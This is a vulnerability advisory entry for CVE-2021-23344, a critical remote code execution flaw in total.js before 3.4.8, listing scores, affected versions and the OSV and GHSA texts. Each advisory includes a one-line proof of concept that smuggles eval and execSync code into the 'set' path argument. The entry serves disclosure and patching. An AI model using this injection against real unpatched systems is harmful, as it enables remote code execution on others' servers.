CVE-2021-23344
Published 2021-03-04
CVE-2021-23344: The package total.js before 3.4.8 is vulnerable to Remote Code Execution (RCE) via `set`.
Priority P357 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EPSS: 4.79% (90.8th percentile)
The package total.js before 3.4.8 is vulnerable to Remote Code Execution (RCE) via `set`.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| totaljs | total.js | < 3.4.8 | 3.4.8 |
| totaljs | total.js | >= 0 < 3.4.8 | 3.4.8 |
| totaljs | total.js | >= unspecified < 3.4.8 | 3.4.8 |
CVSS provenance
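| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |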
OSV
total.js Remote Code Execution Vulnerability
osv·2021-03-19
CVE-2021-23344 [CRITICAL] total.js Remote Code Execution Vulnerability
total.js is a framework for the Node.js platform written in pure JavaScript, similar to PHP's Laravel, Python's Django or ASP.NET MVC. It can be used as a web, desktop, service or IoT application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
### PoC
```js
// To be run in a nodejs console:
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')
```
GHSA
total.js Remote Code Execution Vulnerability
ghsa·2021-03-19
CVE-2021-23344 [CRITICAL] CWE-94 total.js Remote Code Execution Vulnerability
total.js is a framework for the Node.js platform written in pure JavaScript, similar to PHP's Laravel, Python's Django or ASP.NET MVC. It can be used as a web, desktop, service or IoT application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.
### PoC
```js
// To be run in a nodejs console:
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')
```
Published: 2021-03-04